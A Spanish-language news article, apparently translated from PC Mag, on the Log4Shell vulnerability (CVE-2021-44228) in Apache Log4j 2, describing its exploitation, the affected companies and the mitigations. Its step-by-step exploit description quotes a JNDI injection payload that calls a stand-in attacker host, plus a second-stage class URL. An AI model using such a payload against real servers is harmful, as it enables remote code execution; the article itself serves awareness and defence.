Innumerables servidores son vulnerables a la explotación de día cero de Apache Log4j
La vulnerabilidad permite la ejecución remota de código en servidores, incluidos los operados por Apple, Cloudflare, Twitter, Valve, Tencent y otros importantes proveedores de servicios.
Se ha descubierto una vulnerabilidad crítica en Apache Log4j 2, un paquete Java de código abierto que se utiliza para permitir el registro en muchas aplicaciones populares, y se puede aprovechar para permitir la ejecución remota de código en innumerables servidores.
Apache Software Foundation (ASF) ha identificado la vulnerabilidad como CVE-2021-44228; LunaSec lo ha llamado Log4Shell. (Y el investigador de seguridad Kevin Beaumont también tuvo la amabilidad de crear un logotipo para él). ASF dice que Log4Shell recibe la calificación de gravedad máxima, 10, en la escala Common Vulnerability Scoring System (CVSS).
LunaSec ofrece un desglose paso a paso de cómo se puede explotar Log4Shell en servidores vulnerables:
Los datos del usuario se envían al servidor (a través de cualquier protocolo),
El servidor registra los datos en la solicitud, que contienen la carga útil maliciosa: $ {jndi: ldap: //attacker.com/a} (donde attacker.com es un servidor controlado por el atacante),
La vulnerabilidad Log4j se desencadena por esta carga útil y el servidor realiza una solicitud a attacker.com a través de "Java Naming and Directory Interface" (JNDI),
Esta respuesta contiene una ruta a un archivo de clase Java remoto (por ejemplo, http://second-stage.attacker.com/Exploit.class) que se inyecta en el proceso del servidor,
Esta carga útil inyectada desencadena una segunda etapa y permite que un atacante ejecute código arbitrario.
Los investigadores ya han encontrado evidencia de que Log4Shell puede explotarse en servidores operados por Apple, Cloudflare, Twitter, Valve, Tencent y otras grandes empresas. Se dice que la vulnerabilidad también es particularmente fácil de explotar en los servidores de Minecraft, con algunos ataques de prueba de concepto que solo usan el chat del juego.
La versión 2.15.0 de Log4j se ha lanzado para solucionar este defecto, pero The Record informa que su solución simplemente cambia una configuración de "falso" a "verdadero" de forma predeterminada. Los usuarios que vuelven a cambiar la configuración a "falso" siguen siendo vulnerables a los ataques. Afortunadamente, esto significa que los servidores que ejecutan versiones anteriores de Log4j pueden mitigar el ataque cambiando esa configuración.
ASF dice que "este comportamiento se puede mitigar estableciendo la propiedad del sistema 'log4j2.formatMsgNoLookups' en 'true' o eliminando la clase JndiLookup del classpath (ejemplo: zip -q -d log4j-core - *. Jar org / apache / logging / log4j / core / lookup / JndiLookup.class) "en versiones anteriores de Log4j si los usuarios no pueden actualizar a la versión 2.15.0.
El Equipo de Respuesta a Emergencias Informáticas (CERT) de Nueva Zelanda, el CERT de Deutsche Telekom, la empresa de seguridad Greynoise y otros han informado que los atacantes están buscando activamente servidores vulnerables a los ataques de Log4Shell. Estos esfuerzos continuarán y se expandirán, por lo que abordar la vulnerabilidad lo antes posible es fundamental.
Información de PC Mag(r)
Comentarios
Publicar un comentario